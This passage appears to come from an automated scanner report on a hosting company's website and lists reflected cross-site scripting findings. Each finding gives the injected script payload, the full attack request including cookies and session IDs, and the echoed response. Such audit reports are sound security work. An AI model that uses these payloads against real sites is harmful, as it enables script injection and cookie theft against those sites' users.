/cloud_hosting_products/files
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f1d"><script>alert(1)</script>f7c568ebfea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_products/files?51f1d"><script>alert(1)</script>f7c568ebfea=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41035
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/files/?51f1d"><script>alert(1)</script>f7c568ebfea=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.207. http://www.rackspacecloud.com/cloud_hosting_products/files/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/files/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54bc6"><script>alert(1)</script>525482b039d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/files/?54bc6"><script>alert(1)</script>525482b039d=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.208. http://www.rackspacecloud.com/cloud_hosting_products/servers [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/servers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc42"><script>alert(1)</script>0a01396e3d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_products/servers?4bc42"><script>alert(1)</script>0a01396e3d8=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/servers/?4bc42"><script>alert(1)</script>0a01396e3d8=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.209. http://www.rackspacecloud.com/cloud_hosting_products/servers/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /cloud_hosting_products/servers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fcbc"><script>alert(1)</script>8c335d37419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/servers/?7fcbc"><script>alert(1)</script>8c335d37419=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.210. http://www.rackspacecloud.com/cloud_hosting_products/sites [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /cloud_hosting_products/sites
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe137"><script>alert(1)</script>70d40f8db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_products/sites?fe137"><script>alert(1)</script>70d40f8db4e=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/sites/?fe137"><script>alert(1)</script>70d40f8db4e=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.211. http://www.rackspacecloud.com/cloud_hosting_products/sites/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /cloud_hosting_products/sites/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a07"><script>alert(1)</script>0805f68f0b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/sites/?36a07"><script>alert(1)</script>0805f68f0b3=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/sites/?36a07"><script>alert(1)</script>0805f68f0b3=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.212. http://www.rackspacecloud.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13fef"><script>alert(1)</script>ab5bb01d50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?13fef"><script>alert(1)</script>ab5bb01d50b=1 HTTP/1.1 Host: www.rackspacecloud.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.213. http://www.rackspacecloud.com/legal/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /legal/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdf8"><script>alert(1)</script>a24f82e1ede was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /legal/?5cdf8"><script>alert(1)</script>a24f82e1ede=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 79832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.214. http://www.rackspacecloud.com/legal/privacystatement/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /legal/privacystatement/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20633"><script>alert(1)</script>c63c78bd6fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /legal/privacystatement/?20633"><script>alert(1)</script>c63c78bd6fc=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 50676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.215. http://www.rackspacecloud.com/managed_cloud/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /managed_cloud/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeae6"><script>alert(1)</script>10afadf6183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_cloud/?eeae6"><script>alert(1)</script>10afadf6183=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 46000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.216. http://www.rackspacecloud.com/partners/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /partners/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d84"><script>alert(1)</script>07640ec1bd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /partners/?56d84"><script>alert(1)</script>07640ec1bd2=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.217. http://www.rackspacecloud.com/resellers/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /resellers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a865c"><script>alert(1)</script>c89f16ef61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resellers/?a865c"><script>alert(1)</script>c89f16ef61=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the c64ff%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96b4d784cb2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1bd"><script>alert(1)</script>0e717051f60 was submitted in the c64ff%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96b4d784cb2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.219. http://www.rackspacecloud.com/searchresults.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /searchresults.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c64ff"><script>alert(1)</script>96b4d784cb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
